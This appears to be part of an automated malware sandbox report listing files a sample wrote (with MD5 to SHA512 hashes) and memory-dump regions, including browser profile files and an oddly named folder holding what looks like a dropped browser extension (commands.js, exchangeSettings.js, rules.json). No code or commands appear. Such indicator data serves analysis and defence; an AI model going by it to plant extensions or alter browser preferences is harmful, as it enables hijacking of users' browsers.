SHA512 01f61c18736a0771b5ced7503992ef28d958de4cbebbc80320d9e328150f1eef6bcad68e8b07109d7dad31b5c62996927d10eb2fd88228541fbae0e10a5ae378

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 b468db5721c9bea3ee62e6641a2eec9b
SHA1 5d8673c8bdf1aab4b28a410ccfb04f2bf133bbb8
SHA256 487e159403d5c227f56695fa7c9bfc27ff80a1dddea9418545a31c143aeae817
SHA512 d0da6e8aa970d72999c6d975935be30cd3a3e037bf7a90a6ff6df6dd3ca57a6f75eef74c6e5a8214848bdd1a403ca9a75a6f0b8a4beabedd15600f50f3dfff8e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 ba5d56d8b9a3b54c5a9a571add32417c
SHA1 520a619fd900ae9da8c02e607b9b7a2fe5946f68
SHA256 5f688ed7c8e15d6d5fc5688fe7da7203540f764e1f1e49114120a95e6778a162
SHA512 203c75db65641c8677253b74f8d38ce9e43b68ad49786f6bacd621730bc5c6925afd008abb6a91d6ea6e3df79635dbe4554fa0db0cf818121363739184acf474

memory/2288-981-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp

memory/2288-983-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

memory/2288-982-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp

memory/2288-984-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp

memory/2288-985-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

memory/2288-986-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp

memory/2288-987-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

memory/2288-988-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

memory/2288-989-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp

memory/2288-990-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

memory/2288-991-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

memory/2288-992-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

memory/2288-993-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

memory/2288-996-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

memory/2288-997-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

memory/2288-998-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

memory/2288-999-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

memory/2288-1000-0x00007FF87F9A0000-0x00007FF87F9B0000-memory.dmp

memory/2288-1001-0x00007FF87F9A0000-0x00007FF87F9B0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity

MD5 7c2a94bd1042529c7c4436640fff94b7
SHA1 df542e78e77a92e7c69c95f2f1ad6420591ef291
SHA256 b8929be8a20b0b736aa2bf01910526c6007b3568ed8be63a11b4b008e090bcd1
SHA512 2034043a27b4b8984dec729be8d5e66c926e5163aac4addc0182725b49fce0c495b8e08682940f566512f71617a438e208434208e184a84524f2c7549725e22f

memory/2288-1036-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

memory/2288-1037-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

memory/2288-1043-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp

memory/2288-1044-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp

memory/2288-1045-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp

memory/2288-1046-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp

memory/2288-1047-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

memory/2288-1048-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

memory/2288-1050-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

memory/2288-1049-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 7202441009a21953c73a0e5c8587bd99
SHA1 20593b74ebc6d3bff82df44accbc850983204786
SHA256 78a2f852fa9bfdad524669a4e6125ea21ef69a7f33c7a48c609f557d7d77b54e
SHA512 09f2d053afb4c1c20150ab294de8e6969c7f189320e81d20e356ada83fb980369409f80ca70f9e0d61cceb68fbe73b34b45a6acb14c9328ff99e6866a30d03b2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity

MD5 c848ef6c8649b0cdb8c61b7655b56e03
SHA1 9c6636c4c1671521fd63e1a2ff14bbec66892f3f
SHA256 26f83bdbd9fa4decdc73250ab788cf429a207a3d94d5cf1af5372018d1978153
SHA512 f0ae75728c472d2bc8657cd7b3294fcf2b7c413a28c60fddd44c01716f0cd87ecc26d4062ee10c14dd733ab90ae3d93021f5c6d455b86f7d01fc3c98f6f5d022

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 dae7ce8122789a22f1341632928523ec
SHA1 6d556c6623cb9ec19943c16dc8e9c885dec72285
SHA256 b6bcaa99e58edc1c3ef5157118e79ef12ae14b18470f0952dc9320f8a0a7a852
SHA512 414257d4effbb50625412204f30715aaaf829c2b913857a4e2bd591b83b88db7c4b8b80ef84ff1e1ac611e3b051e3a66bbe944aca52e147d4f5a2ce3eeb3ccab

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity

MD5 848cdcb690e2d3ebef461807ffd02d5c
SHA1 9d55e5bbb00b0f8c7100f0c07dc471029c89e7a4
SHA256 238ab7590e50c4122696846333f14fb2ebb8b147f12247207f5369d09715c5f9
SHA512 0996431d5a3da2b799f34afe73716b89a7ca37dfd2d22ec5d5d994d3fbc3cbb79c5325097da1dab9764c7bde70773fe1c795f419d7e6bc8e2fbbf7bf42834a23

memory/1640-1090-0x000000006B480000-0x000000006B4C1000-memory.dmp

memory/1640-1089-0x0000000065A80000-0x0000000065AAA000-memory.dmp

memory/1640-1091-0x000000006A800000-0x000000006A80F000-memory.dmp

memory/4912-1098-0x00000000000E0000-0x0000000000108000-memory.dmp

memory/4912-1100-0x00000000000E0000-0x0000000000108000-memory.dmp

memory/4016-1099-0x0000000065A80000-0x0000000065AAA000-memory.dmp

memory/4016-1097-0x0000000000400000-0x000000000054C000-memory.dmp

memory/4016-1101-0x000000006B480000-0x000000006B4C1000-memory.dmp

memory/4016-1102-0x000000006A800000-0x000000006A80F000-memory.dmp

memory/4912-1103-0x00000000000E0000-0x0000000000108000-memory.dmp

memory/4016-1105-0x0000000063080000-0x00000000630A9000-memory.dmp

memory/2496-1113-0x00000000000E0000-0x0000000000108000-memory.dmp

memory/2496-1114-0x00000000000E0000-0x0000000000108000-memory.dmp

memory/2496-1115-0x00000000000E0000-0x0000000000108000-memory.dmp

memory/3700-1116-0x0000000000400000-0x000000000054C000-memory.dmp

memory/3700-1118-0x000000006B480000-0x000000006B4C1000-memory.dmp

memory/4212-1122-0x00007FF89F8C0000-0x00007FF8A0381000-memory.dmp

memory/4212-1123-0x0000019FEE260000-0x0000019FEE270000-memory.dmp

memory/4212-1124-0x0000019FEE260000-0x0000019FEE270000-memory.dmp

memory/4212-1135-0x0000019FEE260000-0x0000019FEE270000-memory.dmp

memory/3456-1153-0x00000000000E0000-0x0000000000108000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5j8DxCjO4h6M7cc..dat

MD5 bc8c2ebedf8f83ad188ed263f1cd3375
SHA1 abc42cabb39db3cb6f4d6e526b2bd01fc99d58be
SHA256 cd454c9fca4756a4e896a12686877ea8331928b7b9c2beba233df72426b9b7fa
SHA512 21216157309e04e3690b89914a0d22786f18f9f36a6d841bbca9328d58dd0a8804056e9beb9f462ddffe8114231b831eb46e26268920aeb94979cf3a226c70c5

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\rules.json

MD5 6c96a8e0dc7f99afebd022054a96bff5
SHA1 836c9f51bbbc8e5dc096cee29d7354b3a2211de1
SHA256 464f3f4c07331ae1f15fe0e6a209b4cfaf8cfce14a7c79eb192cbf2c49bbcb19
SHA512 ebad39459aead9cac1d3d1bd27459de20f107a19c3492678b869d8488e014fb2fba168c7a0d98cfb7742a4052e20ba526bef29aa63cf79f923dbdb926c87469d

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\modules\content-scripts-register-polyfill.4.0.0.js

MD5 e2cdab6fd36bc5e771aa9e4ee2792ce4
SHA1 fd3fee7dc43c59636c8663a38cdef6ed1ccc6a25
SHA256 9d1c97a6c1bf526de3f65a54f691d2540ca1dd300ed038f1df41f5fbd9ed2730
SHA512 e9741d3753f8483d033f00a4041d0d248b8013746d023ab31edeb649faf8f14a55e49a582fce1b0fa13866fc6d50917df683e3aca211d56b8e9855e7a93038fb

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\commands.js

MD5 356e0d12f629ea365f915f4601251524
SHA1 32abd4c94b877d2e4e68199c589fc9c5d96efabb
SHA256 185096fa1cda20813b58cae34659717e79fbd8bd8b89c95c9a93e3ca68efa2a1
SHA512 5b742841924421fc32dc0206d40a011546fa29629077ee6df644d9c3aa2fe36bc01d4ad1a939b1a79d4b5ec6d82cdcd5b157ad4a438e34db7ba99eaedced9d68

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\extensions.js

MD5 cab74f7fb79c1921db62ffcbf2a43041
SHA1 03d69ccbe480d09a94cbe394d9d5befcc68133ba
SHA256 c4fe0a069bcc13d3f783deb92e3adab1053c5d99407547f1fcbe39c7f342af39
SHA512 044754865af6950bf7b534e74d608bb47df3a537904f89e61bc4c2c03860de45786504e2fdebb4d4ef356c8ba078ce1fb185d4beb1fde1407c41511bdb07cc76

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\exchangeSettings.js

MD5 055b125ec5b05895873435e423eca4f1
SHA1 811c2f93b1b3644952c2a6eab8ef9dd8c9605edf
SHA256 2c9084f1d82aae713607e72e6f7825076328a9f3dfaa6ad89d7d069235a95e7c
SHA512 ab99affad8a6f4762dc5ee2b906f7c2d4a0cfb448a095026d0039b74355b3a8303aafd97d1674fce2ef8db121a4beac134e356f86237ca45f14b155c5f5bdebe

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\app.html

MD5 a10ca2219a68335cf253395574f7d285
SHA1 a7111f1292518214ff4bf0920432c72c978c5b65
SHA256 e9b3c0b944e83cedb78440a99cb793fdf32fa6ea8c36fb89c638de75f3af602c
SHA512 61a1c7905dc6077fb2bc55296c7d477ca8fbf5e0763633356fdb32844f128313e629bb7c0f7081939b75eb5c452b8480e60b36eb88ca2477b5abd9b5eb4ccbe7

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\utils.js

MD5 86eaae8138cf039c05e0be5dc807d9f1
SHA1 6a43f5227be21c2a3a2526cd3dd6a6e10425ea04
SHA256 0f2b72153f263cfd7c2e5640d2362a1731253070c408d278ded46bb762e50f14
SHA512 686e7090d10c35c404c510214a31d80a2ac041f6db2cb94d8f6f5ae47c146fb18eab96573c33e1d5ca4dfc21ac70abe94b4412d6b9621de9a9d01d85229acf99

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 31af3e895896b8bc25db0004afa3bb1f
SHA1 bb8ce8e9e725f76a2d64d21afdfb287b4a74c11a
SHA256 142c5c4cfeb0b968fe312d89282b0d4979225b3285bfc1ba2fd5897d3487180c
SHA512 ea7e780c2e8a42780c4dc19eb182dc8542f5b34047589a720c7b3fc4fdb76a992b3722d105f3ff617e0ede9ce37e7db3bc261081ff7b46d9924d96bfbd41756c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 ffb219f47d2339fd257b6bef93dd11e9
SHA1 2efcfc93f9609a88e861126d84cfd59b2b318254
SHA256 33ca89491898d6236f025c6e890a64a161a6ea7802d6ffd063926e3174d4c750
SHA512 0e412a272fe86346a9a6489c703f36c2c658b4f1bafce072ac43aaeb3d5b33b05230599b6a8e8baebed519413dad7dcbe0e0ad8b13904a06c80c256b6aba1bba

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 c0aa56b55ea267df672bd20da3afe198
SHA1 a823036510dd563efd962a810897a45d78ca4b9c
SHA256 b8ed7d1bb5afd384da5db05fb8f369fc618f0f40b0966f64c3ade80049c41d22
SHA512 ea66ecc5a1b3492fa8f96d8f42209d803c9e14539451a06d2727e99b81a403dbdb5df94e4407a5508ebe3217a4b7afdab2958ebf39efe58558cd8769034e5352

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 a421394116d7192e61e44dcca8be2b1f
SHA1 277706740e054511b9f9566046eeb3e5a92176b4
SHA256 2b9a05993ff2bc5552e8270759112d3ca61c1e34d7fc19654eab4075e854441b
SHA512 a6e988c4aa12f8c96a5039c24d996ed2f8efdf612fe77de5e2fca63d3a1436dcca31b7d14d9fb6fe3face43e70bca8cd797a96f2bdd404872eb43d7593743562

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 b6a2107c0bf35a9c542f6ea337939a4d
SHA1 0e5015bcd2c1bbac0790696a6af69724a9fe218d
SHA256 d1ed1a71ff94d7d2ebe02bd87ea2b439d25552a2fea59c142b081a80f910aed6
SHA512 8906be1e7432f5aaab05a4bffe85460c6e6fec7b6052d1c3060de40370380bf0e236a10a7cdd3c3ed3724dd203a348ad372769a6b7ffcba58513bcbbd221c9c5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 e66048e11418e28153d4a508e6e3ebda
SHA1 f819e21c18516b257b4a62fe218a5edf6e067f8e
SHA256 c3f7902a1f34e0611e2b9e10d9804128e994b6f995b41c68aa261dc22c47bc43
SHA512 dcebea62a05bde4373982ceb6edbcafa23da187009f7949b47846749f23d5d4440d73c595e8f04044fb2ed5b1bee342759bd23e5415a35a58f439f8d692749e4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity

MD5 8c24bba1a11e3cb4000b3b8f15d82a66
SHA1 bb59e3574b1b0f497206eb37ffc7d9138b198200
SHA256 f2727a0d42fabb6cd86e1cdcf2f299afc43595a1f6804d957be87a5bf4cd65ca
SHA512 b95f111b5b99647b3e3555a34de9fd3c6b8bbd795a646ca5b3948563b990daf041fb78fa1865dd8f5f99b85e423ccf07e8c5911f863ccdab03c88883aa256fed

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\b0359595-04a9-467f-b06d-95c7ede11ec8.dmp

MD5 295e9b37bc3a8699ac9d5d50d89b73d9
SHA1 6e7671d80e81ad68a6f7ee56420ac9f076c162fe
SHA256 0088fcda612d3fbeeb1ed813669f96e9822243458d247c67238f7c20be5f403d
SHA512 e3a9f309b0da9f3e91cad263d9ea4d0df049ffcfdd40852c0a161e6186b6a11dc6938ac9c9fbbf14ba5f9b3a5e3721e0af763750e0655e5a254b2251bfb08733

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 0b821d41f9230f6d01e4fbf49a7c2937
SHA1 a4fe181bdeeb0e7a97813c1c4d604deb1ccb6f31
SHA256 867eeb0668835879b2f2e99c4fc20c9318ffab5c82f091712efcd76f6f94cd00
SHA512 85ea8b5667a18ab703f14a9fb63faf3160b8419b5f7e5f1d479d7666f4558f4cd7dcf4da6a36965daa45f5f3486dbdc06ec0e34b3a0c765855ff309f53595d5e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 6e8402929329a1948373d43b96ae3b0f
SHA1 a46eb3c12614ff4b850bf8cf4d492f596b8a207a
SHA256 da4ea854907f1c8c8e655d7f3d7c19511fbbaf8fb6bba92471ba8962f10326a2
SHA512 e760d2820af6d4de29654cea592d8ff6f033482e2aa5b888ed45233ff30d01e38db8d9d074abd0c5e449270abfaf284db5752160891c0f2892142b261ac503ce

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 8d3aec1158b16a4b346a5b1f9edce498
SHA1 b186c54befa103b3982e4b655d1fe781a1b277b5
SHA256 859c7fc1d6735cec0d3b8b620199f3b63181bf5c28f89c4f0acd05e4ba3c919b
SHA512 40089f514147b0374e11ca4704126e42a1359fc01d35d6de0536a60cda1d9ad325d7b62c34fdc7966067252302ad3e062f05788adddeb354d4f76b0e46d81674

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 7bc5657e8c1e87a70e4c31e84f6b10eb
SHA1 6888bc8a52b514fd8ea71a5fa8590fc245420e98
SHA256 734057e66f81b40992c1ffa55670b33e0d1288e36af53cc65d45066883987d60
SHA512 e59c2dc55624e1f1e43fd0a50b355a1863a0d5bc366cb00935eb2f080bf3d7096676d99d6c1bcd542ce6d26bceaf8bb0c921f73c23442babb3bc3bc38fb50a99

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_1

MD5 f26372955c1344efee1686dd10fac4c5
SHA1 6a0e58444e9f9be90588c397b37a438db2bed294
SHA256 b9b110e6e85ffabf8440785d4ac0e0924ec577be3edf1ba7d6fe466039e88cb8
SHA512 706dc8267bc04acf6da06e93cdbdcc84b4ff56df4327c849472a73666a6dca113d8236dcc79c1bccc5b05d1ff8619c79e1334cfe159f3cf8be4f7cd082cfdb30

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000016

MD5 757d6eefadad52434d858027028b5a5a
SHA1 baa970f53eccf09e806f4d12840bd0dd172285a5
SHA256 ee5d5dc43d17b5c0e6871674128062560cf846a4cde2752bfdf91214bae301dc
SHA512 ac09cfb97c3bf28b0cac425490ee0d263832946cfea99a13cccb7da5a586ba15ed0f6fbfe0bd7d9ec983b8b2717aa0e15abaa27239caca25fcebe840cb6555d1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 ea2073edde46f27e79fd05eea3f52e3a
SHA1 ddafdcf9cff8f7c5ac2b03ad62a79ee3d9ba0cef
SHA256 0d00aead436b1f8d6900964132eb475ba8e896d95d572d0f6d53c8d5993a837b
SHA512 ffcf6c400eff528f05c88fc2a3568e44da6317bfe54971f0ab968a8771019536d721cb3301120c8230a2291c9c7deffa1e8fb964dedc0f8cbcb3b81b98f1cfb2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity

MD5 0ebf781469919430d17e3bc895a151d6
SHA1 843540b5130b87996b1f8df08a1fa693269937be
SHA256 ee7272ef1e09b2c9fcfe4a88a35468977c8c7c6048b13bc292f0f70350ca15b6
SHA512 1e398c25e01a43757f902a37a5342c99e73865a22f21a2feb62f6ce2d6eb6def14672a386f61537c9779d26fa6af4cc06478d042301303aea6c9cb0faeb83ea5